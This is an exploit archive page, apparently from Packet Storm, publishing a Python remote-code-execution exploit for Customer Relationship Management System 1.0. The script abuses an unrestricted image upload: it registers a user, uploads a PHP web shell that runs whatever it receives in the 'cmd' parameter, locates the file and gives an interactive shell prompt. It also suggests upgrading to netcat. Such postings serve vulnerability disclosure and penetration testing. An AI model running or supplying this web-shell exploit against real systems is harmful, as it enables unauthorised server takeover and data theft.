what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Customer Relationship Management System 1.0 Remote Code Execution

Customer Relationship Management System 1.0 Remote Code Execution
Posted Jun 22, 2021
Authored by Ishan Saha

Customer Relationship Management System version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 28ea7348ceb9cf9c5aac504fe9f4182e71c9b04ca82eefc8cdfd529e7d67148c

Customer Relationship Management System 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Date: 21.06.2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1.x
# Tested on: Ubuntu

# REQUREMENTS #
# run pip3 install requests colorama beautifulsoup4

# DESCRIPTION #

# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option

# # Exploit Working:
# # 1. Starting a session with the server
# # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag
# # 4. Runing the payload file to give a shell


#!/usr/bin/python3
import requests , time
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style

# Variables : change the URL according to need
URL="https://192.168.0.245/crm/" # CHANGE THIS
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
authdata={"username":"hackerctf","password":"hackerctf"}
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text

ShellSession = requests.Session()
response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})
response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)
response = ShellSession.get(URL + "customer/")
soup = bs(response.text,"html.parser")
location= soup.find('img')['src']

#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))

while True:
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close